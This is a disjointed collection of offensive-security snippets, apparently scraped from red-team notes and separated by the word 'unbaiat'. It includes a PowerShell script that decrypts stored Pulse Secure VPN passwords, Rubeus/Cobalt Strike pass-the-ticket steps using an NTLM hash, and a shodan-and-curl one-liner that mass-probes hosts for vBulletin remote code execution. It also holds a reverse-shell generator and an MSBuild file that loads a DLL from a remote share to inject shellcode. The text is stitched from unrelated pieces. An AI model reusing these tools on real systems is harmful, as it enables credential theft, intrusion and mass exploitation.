unbaiat

unbaiat

unbaiat

<?php 
/*
	Name : KNOCK KNOCK
	Owner : Naman Sahore
	Email : [email protected] 
	Published on : 30th July 2017

	This program is distributed in the hope that it will be useful,
	but WITHOUT ANY WARRANTY; without even the implied warranty of
	MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.

unbaiat

Add-Type -AssemblyName System.Security;

$ives = Get-ItemProperty -Path 'Registry::HKEY_USERS\*\Software\Pulse Secure\Pulse\User Data\*'
foreach($ive in $ives) {
    $ivename = $ive.PSPath.split('\')[-1].ToUpper()
    Write-Host "[+] Checking IVE $($ivename)..."
    $seed = [System.Text.Encoding]::GetEncoding('UTF-16').getBytes($ivename)
    # 3 possible value names for password
    $encrypted = $ive.Password1
    if(!$encrypted){

unbaiat

# PowerView's last major overhaul is detailed here: http://www.harmj0y.net/blog/powershell/make-powerview-great-again/
#   tricks for the 'old' PowerView are at https://gist.github.com/HarmJ0y/3328d954607d71362e3c

# the most up-to-date version of PowerView will always be in the dev branch of PowerSploit:
#   https://github.com/PowerShellMafia/PowerSploit/blob/dev/Recon/PowerView.ps1

# New function naming schema:
#   Verbs:
#       Get : retrieve full raw data sets
#       Find : ‘find’ specific data entries in a data set

unbaiat

Windows version:
	reg query x64 HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion

Users who have authed to the system:
	ls C:\Users\

System env variables:
	reg query x64 HKLM\SYSTEM\CurrentControlSet\Control\Session Manager\Environment

Saved outbound RDP connections:

unbaiat

##### IF ELEVATED:

# grab a TGT b64 blob with a valid NTLM/rc4 (or /aes256:X)
beacon> execute-assembly /home/specter/Rubeus.exe asktgt /user:USER /rc4:NTLM_HASH

# decode the base64 blob to a binary .kirbi
$ base64 -d ticket.b64 > ticket.kirbi

# sacrificial logon session (to prevent the TGT from overwriting your current logon session's TGT)
beacon> make_token DOMAIN\USER PassWordDoesntMatter

unbaiat

shodan search http.favicon.hash:-601665621 --fields ip_str,port --separator " " | awk '{print $1":"$2}' | while read host do ;do curl -s http://$host/ajax/render/widget_tabbedcontainer_tab_panel -d 'subWidgets[0][template]=widget_php&subWidgets[0][config][code]=phpinfo();' | grep -q phpinfo && \printf "$host \033[0;31mVulnerable\n" || printf "$host \033[0;32mNot Vulnerable\n";done;

unbaiat

#!/bin/bash
# This is not great...
#
NAME=Shell
TAC=TrustAllCertificates
LHOST=10.0.0.254
LPORT=4444
COMMAND='"powershell"'

CURDIR=$(pwd)

unbaiat

<Project xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
            <Target Name="MyTarget">
                <SimpleTask MyProperty="My voice is my passport."
                MyCode='<base64 encoded x64 shellcode>'
		MyProcess='C:\Program Files\Internet Explorer\iexplore.exe'/>
            </Target>
        <UsingTask TaskName="SimpleTask" AssemblyFile="\\192.168.120.129\share\IEShims.dll" />
</Project>